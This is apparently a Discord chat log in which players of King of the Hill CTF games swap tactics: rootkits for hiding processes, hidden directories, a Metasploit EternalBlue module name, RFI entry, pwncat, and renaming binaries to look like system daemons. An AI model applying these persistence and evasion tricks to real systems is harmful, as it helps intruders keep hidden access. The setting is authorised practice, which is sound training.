There is also the issue of compatibility with the koth kernel, as it is older (so this could also be another of the difficulties of creating something like this for koth) , but when I played koth, I don't know how it is now, but there were few players who used LKM to hide processes/directories, and even fewer players who use it something at kernel level to protect king

civic vortex
#

yeah, I only tried on kernel 4.x

#

I can imagine the pain for kernel 3.x

obsidian lark
steep agate
#

if you put a new koth player against something like that, he will hardly know what to do

obsidian lark
steep agate
#

Yeah

split gyro
#

how hard are the koth?

fading moat
safe bough
#

Hey @timber vale, how did you lock the king file like that? 🙂

#

I know about chattr, but what you did was different, no?

timber vale
safe bough
#

Damn... Alright, I'll figure it out sooner or later..

#

What about your infinitely looped hidden directories? I couldn't figure out what you were doing in there, so I just kept deleting them.. lol

timber vale
frail nymph
safe bough
#

/var/spool/mail/.../root/root/root - what's that about? 🙂

#

Haha thanks, I will. I've watched a bunch but lots left to go through. Any particular recommendations?

timber vale
#

in /var/spool/mail/... but nothing in /root ...

frail nymph
safe bough
#

Maybe it's auto created by pspy ? /var/spool/mail/.../l/l/l/l/l/l/l/l

#

Alright thanks, I'll look it up 🙂

timber vale
#

no i downloaded it my self in there the pspy name was changed to l

safe bough
#

Oh I see 🙂

timber vale
safe bough
#

I was using pspy as well, that's how I saw some of what you were doing. and i moved in a static chattr binary, but it didn't do me a whole lot of good, lol. But it's a fun learning experience 🙂

sleek tundra
#

The first thought that came to my mind was blockdev.

fallen palm
#

Anyone wanna join koth.? M sitting alone there

#

9 minutes till new one starts

obsidian lark
#

Any thoughts

safe bough
#

My vpn is acting up and I'm too tired to fix it. Catch you next time @timber vale

timber vale
#

he keep shutting down the machine its annoying and against the rules:

sturdy fox
fading moat
sturdy fox
fading moat
fading moat
sturdy fox
steep agate
#

i'm kidding 😄 🤣

fair adder
#

So what does this exactly do? xd

#

Remove/lock the binaries?

steep agate
#

but removing binaries is against the rules, you can only remove chattr xd

fair adder
#

Mmm they should made an exception for reboot and shutdown

#

As rebooting / shutting down is against the rules too

steep agate
#

using iptables too

#

iptables can block specific packets, specific IP, etc.

#

but in the rules it says you can only remove chattr

fair adder
#

Idk, never played koth

#

And I think I dont want to

#

When reading this channel sometimes

fading moat
light flame
steep agate
steep agate
#

Or maybe it was him with another account, but from the same country

light flame
fallen palm
#

Aah that aliali guy , thatswhy everyone had to reset the machine 4 times and still we couldn't connect to the machine cause he was shutting it down

young bramble
light flame
obtuse karma
frail nymph
#

Is there anyone who play regularly at certain time?

#

I wish to participate.

obsidian lark
#

I am playing now

frail nymph
#

Nice

#

Share the room here

#

please

obsidian lark
frail nymph
#

I am in

obsidian lark
#

nice

frail nymph
#

Let's use discord for voice chat

obsidian lark
#

I see you on voice chat, how do I join?

frail nymph
timber vale
#

no one was with me from the start and the game started anyway.
some times this could happen if someone quit just before the game start but in this case
no one even joined from the beginning 😂

frail nymph
#

Can I join?

timber vale
#

ok let me send you link im very bad at windows anyway

frail nymph
#

Please do not choose windows machine

timber vale
#

its offline machine

frail nymph
#

I have not been win priv esc yet

timber vale
#

exploit/windows/smb/ms17_010_psexec

frail nymph
#

Did you overwrite all flags? @timber vale

#

You have break my shell now @timber vale

#

lol

timber vale
#

i didnt do any of those things

#

im playing two other games

frail nymph
#

I am not able read any flags and size of all flags are same abruptly .

timber vale
#

i didnt modify anything what cmd you used to read flags

frail nymph
#

dir flag.txt

timber vale
#

its type flag.txt

#

here i read one for you as example from the machine

frail nymph
#

Please extend timer for a bit

timber vale
frail nymph
#

II want to try more

timber vale
#

i cant extend the game its a public game

frail nymph
#

Oh

timber vale
#

and no one is there

frail nymph
#

Thanks

#

How do you find these games?

timber vale
#

i just join public games

#

the machines are random

frail nymph
#

Me too

timber vale
#

i dont have premium rn so i cant make private rooms but i dont think you can even extend the time if you have premium the machine is just one hour but im not sure

frail nymph
#

I found gloria's key and password too

#

but I am not able to login through SSH

#

Any idea

#

Did you disable ssh? @timber vale

timber vale
#

but i didnt disable anything thats against the rules

#

try using port 1337

#

i think ssh is on that port

#

by default

frail nymph
#

I did not see that port open wow.

#

I cracked password and it was dance but it is not accepting it. @timber vale

#

||image||

timber vale
#

yeah idk why then i never used that way of getting in so i dont know but let me check if that key is there

frail nymph
#

Thanks

timber vale
#

yes its there

#

my main way of getting in was RFI on port 5555

frail nymph
#

Do you mean LFI?

timber vale
#

check your dms

#

so i dont spoil the machine for other people

timber vale
light flame
frail nymph
#

Nice

fallen palm
#

really..?? @mild forge

placid fable
frail nymph
#

did anyone patch Tomcat/Coyote

#

I have a question guys. Is there anyway I can redirect my commands from my terminal to nc shell after getting connection from box. Like can I run a script stabilise shell.

frail nymph
#

I am not able to find king.txt file in offline machine

violet zealot
frail nymph
violet zealot
#

Then write the commands urself blobfingerguns

frail nymph
violet zealot
timber vale
frail nymph
#

I could not found it in cmd

#

I checked online

frail nymph
placid fable
near lily
#

pwncat-cs is god tier.

placid fable
#

I helped a little bit in this tool fawaz

violet zealot
placid fable
#

I had a chance to maintain this project, but I had my Uni then😭

frail nymph
placid fable
frail nymph
#

I have downloaded Pwncat and pwncat-cs

#

Can you send me some reference how can I use it.

near lily
#

sudo pip3 install pwncat-cs

#

Read their github.

frail nymph
#

Done

#

and then?

near lily
#

Literally read their github, it will show you faster than I can tell you.

frail nymph
#

I have noticed that I missed an error Error: uninstall-no-record-file

#

Any idea @near lily

steep agate
#

Finding hidden kernel modules (extrem way reborn): 20 years later

timber vale
fading moat
steep agate
#

This new zine that came out on phrack is really interesting, I'm thinking about implementing some things I saw in it, but unfortunately, it only detects it, but it's very good, I have ideas on how to make it visible again

#

KoviD is currently the best lkm rootkit

#

so it's legal to use it as forensics tests

light flame
obsidian lark
#

who's h4des666?

#

he put down koth service on multiple games

#

and shutdown/reboots the box

near lily
#

Please don't cross post this.

regal chasm
#

@timber vale go easy lol

regal chasm
#

is KOTH down?

#

never mind, was getting 404 when attempting to join public game.

#

@timber vale you gotta show me some tricks!

regal chasm
#

lets go appriciate it!! just won my first match.

timber vale
placid fable
#

That's nice.
+rep @obsidian lark

I would create a static binary and give it a name similar to one of the processes running on the system like agetty, apache or apache2, fcron, httpd with minor changes (e.g. agentty) and pass fake arguments to write to king.txt and reverse shells :p

sour vectorBOT
#

Gave +1 Rep to @obsidian lark (current: #447 - 11)

sour vectorBOT
#

Gave +1 Rep to @placid fable (current: #35 - 220)

regal chasm
obsidian lark
regal chasm
#

nah deadsecarmy

obsidian lark
#

icic

regal chasm
obsidian lark
regal chasm
#

wait are you guys already off of hogwarts lol?

obsidian lark
#

im still playing lol

regal chasm
#

yeah i cant even ping to the ip anymore

#

all my connections are timing out

#

to the machine

obsidian lark
#

it works for me

#

hades put down ftp

regal chasm
#

yeah its weird. I was previously logged into the ftp server too and got the secret file that's in there but when changing directories, it was not to fond of that command i guess.

obsidian lark
#

there's no point playing now, he uses autopwn

regal chasm
#

bruh autopwn is so annoying but it lowkey gets you ready for whats really out there!!

#

is the rootkit being used by others when all my permissions are cut in my root shell?

#

im gonna practice writing to king.txt but some people are so quick to get there and make it a read only file and that leaves me stumped.

obsidian lark
regal chasm
#

yeah i tried that ass root and im hit with permission denied messages. i was also on your git page trying some magic on there but also denied with a couple of those cmds as well

#

as*

#

theres curently 4 different king.txt all different extensions

obsidian lark
#

its prolly a loop, find pid -> kill it

regal chasm
#

ok im just getting trolled now lol by the king

#

every session is just being closed

stiff egret
regal chasm
#

oh buddy the nayan cat

#

just popped up

#

thats actually pretty funny

#

getting straight up nyaned

steep agate
stiff egret
steep agate
#

btw or hide your process using rootkit userland/kernel land, or use a simple trick with mount, to mount your process in another directory, just to avoid them killing your shell, there are players who can only play like this 😄

regal chasm
#

anyone wanna play a private match?